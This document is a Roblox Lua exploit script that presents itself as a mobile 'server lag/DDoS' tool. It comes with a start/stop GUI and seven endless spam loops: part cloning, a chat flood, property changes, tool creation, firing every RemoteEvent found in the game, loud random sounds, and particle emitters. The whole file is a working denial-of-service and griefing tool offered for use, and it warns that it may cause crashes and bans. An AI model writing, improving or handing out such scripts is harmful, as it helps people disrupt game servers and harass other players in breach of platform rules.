-- ============================================
-- MOBILE SERVER LAG/DDOS SCRIPT
-- Optimized for Roblox Mobile
-- ============================================

local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local RunService = game:GetService("RunService")

-- MOBILE-OPTIMIZED LAG METHODS
function mobileLagAttack()
    print("📱 MOBILE LAG ATTACK STARTED")
    
    -- METHOD 1: CHARACTER SPAM (Mobile Friendly)
    spawn(function()
        while true do
            -- Spam clone character parts
            local char = LocalPlayer.Character
            if char then
                for _, part in pairs(char:GetDescendants()) do
                    if part:IsA("BasePart") then
                        local clone = part:Clone()
                        clone.Parent = workspace
                        clone.Position = Vector3.new(
                            math.random(-1000, 1000),
                            math.random(0, 500),
                            math.random(-1000, 1000)
                        )
                        game:GetService("Debris"):AddItem(clone, 5)
                    end
                end
            end
            wait(0.01)
        end
    end)
    
    -- METHOD 2: CHAT SPAM FLOOD
    spawn(function()
        local spamMessages = {
            "L", "A", "G", "G", "I", "N", "G",
            "X", "X", "X", "X", "X", "X", "X",
            string.rep("A", 200), -- Long string
            string.rep("B", 200),
            string.rep("C", 200)
        }
        
        while true do
            for _, msg in pairs(spamMessages) do
                pcall(function()
                    LocalPlayer:Chat(msg)
                end)
                wait(0.05)
            end
        end
    end)
    
    -- METHOD 3: PROPERTY SPAM
    spawn(function()
        while true do
            -- Ubah properti berulang-ulang
            if LocalPlayer.Character then
                local humanoid = LocalPlayer.Character:FindFirstChild("Humanoid")
                if humanoid then
                    for i = 1, 100 do
                        humanoid.WalkSpeed = math.random(16, 100)
                        humanoid.JumpPower = math.random(50, 100)
                        wait(0.001)
                    end
                end
            end
            wait(0.1)
        end
    end)
    
    -- METHOD 4: TOOL/WEAPON SPAM
    spawn(function()
        while true do
            -- Spam tools/weapons
            local tool = Instance.new("Tool")
            tool.Name = "LAG_TOOL_" .. tick()
            tool.Parent = LocalPlayer.Backpack or workspace
            
            -- Add banyak parts
            for i = 1, 20 do
                local part = Instance.new("Part")
                part.Size = Vector3.new(1, 1, 1)
                part.Parent = tool
                part.Name = "LAG_PART_" .. i
            end
            
            wait(0.1)
            pcall(function() tool:Destroy() end)
        end
    end)
    
    -- METHOD 5: REMOTE EVENT SPAM (Lightweight)
    spawn(function()
        while true do
            -- Cari semua remote event
            for _, remote in pairs(game:GetDescendants()) do
                if remote:IsA("RemoteEvent") then
                    for i = 1, 5 do
                        pcall(function()
                            remote:FireServer({
                                type = "spam",
                                data = tick(),
                                count = i
                            })
                        end)
                    end
                end
            end
            wait(0.2)
        end
    end)
    
    -- METHOD 6: SOUND SPAM
    spawn(function()
        while true do
            local sound = Instance.new("Sound")
            sound.SoundId = "rbxassetid://" .. math.random(1000000, 9999999)
            sound.Volume = 10
            sound.Parent = workspace
            sound:Play()
            game:GetService("Debris"):AddItem(sound, 1)
            wait(0.05)
        end
    end)
    
    -- METHOD 7: PARTICLE SPAM
    spawn(function()
        while true do
            local part = Instance.new("Part")
            part.Size = Vector3.new(1, 1, 1)
            part.Position = Vector3.new(
                math.random(-100, 100),
                math.random(0, 50),
                math.random(-100, 100)
            )
            part.Parent = workspace
            
            local particle = Instance.new("ParticleEmitter")
            particle.Rate = 1000
            particle.Parent = part
            
            game:GetService("Debris"):AddItem(part, 3)
            wait(0.1)
        end
    end)
end

-- GUI FOR MOBILE
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "MobileLagGUI"
screenGui.Parent = LocalPlayer:WaitForChild("PlayerGui")

-- START BUTTON
local startBtn = Instance.new("TextButton")
startBtn.Name = "StartLag"
startBtn.Text = "☢️ START LAG"
startBtn.Size = UDim2.new(0, 150, 0, 50)
startBtn.Position = UDim2.new(0.5, -75, 0.3, 0)
startBtn.BackgroundColor3 = Color3.fromRGB(255, 50, 50)
startBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
startBtn.Font = Enum.Font.GothamBold
startBtn.TextSize = 16
startBtn.Parent = screenGui

-- STOP BUTTON
local stopBtn = Instance.new("TextButton")
stopBtn.Name = "StopLag"
stopBtn.Text = "🛑 STOP LAG"
stopBtn.Size = UDim2.new(0, 150, 0, 50)
stopBtn.Position = UDim2.new(0.5, -75, 0.4, 0)
stopBtn.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
stopBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
stopBtn.Font = Enum.Font.GothamBold
stopBtn.TextSize = 16
stopBtn.Visible = false
stopBtn.Parent = screenGui

-- STATUS
local statusLabel = Instance.new("TextLabel")
statusLabel.Text = "Status: READY"
statusLabel.Size = UDim2.new(0, 200, 0, 30)
statusLabel.Position = UDim2.new(0.5, -100, 0.2, 0)
statusLabel.BackgroundTransparency = 1
statusLabel.TextColor3 = Color3.fromRGB(100, 255, 100)
statusLabel.Font = Enum.Font.Gotham
statusLabel.TextSize = 14
statusLabel.Parent = screenGui

-- STATE
local lagging = false
local threads = {}

-- CONTROL FUNCTIONS
startBtn.MouseButton1Click:Connect(function()
    if not lagging then
        lagging = true
        startBtn.Visible = false
        stopBtn.Visible = true
        statusLabel.Text = "Status: LAGGING SERVER"
        statusLabel.TextColor3 = Color3.fromRGB(255, 50, 50)
        
        print("☢️ STARTING MOBILE LAG ATTACK...")
        mobileLagAttack()
    end
end)

stopBtn.MouseButton1Click:Connect(function()
    if lagging then
        lagging = false
        startBtn.Visible = true
        stopBtn.Visible = false
        statusLabel.Text = "Status: STOPPED"
        statusLabel.TextColor3 = Color3.fromRGB(100, 255, 100)
        
        print("🛑 LAG ATTACK STOPPED")
        
        -- Clean up
        for _, obj in pairs(workspace:GetChildren()) do
            if obj.Name:find("LAG") or obj.Name:find("SPAM") then
                pcall(function() obj:Destroy() end)
            end
        end
    end
end)

-- PERFORMANCE MONITOR
spawn(function()
    while true do
        if lagging then
            -- Monitor FPS
            local fps = 1 / RunService.RenderStepped:Wait()
            statusLabel.Text = string.format("Status: LAGGING (FPS: %.1f)", fps)
        end
        wait(1)
    end
end)

print("========================================")
print("📱 MOBILE SERVER LAG SCRIPT LOADED")
print("========================================")
print("Methods:")
print("1. Character Part Spam")
print("2. Chat Flood")
print("3. Property Spam")
print("4. Tool/Weapon Spam")
print("5. Remote Event Spam")
print("6. Sound Spam")
print("7. Particle Spam")
print("========================================")
print("⚠️ WARNING: May cause crashes/bans")
print("========================================")
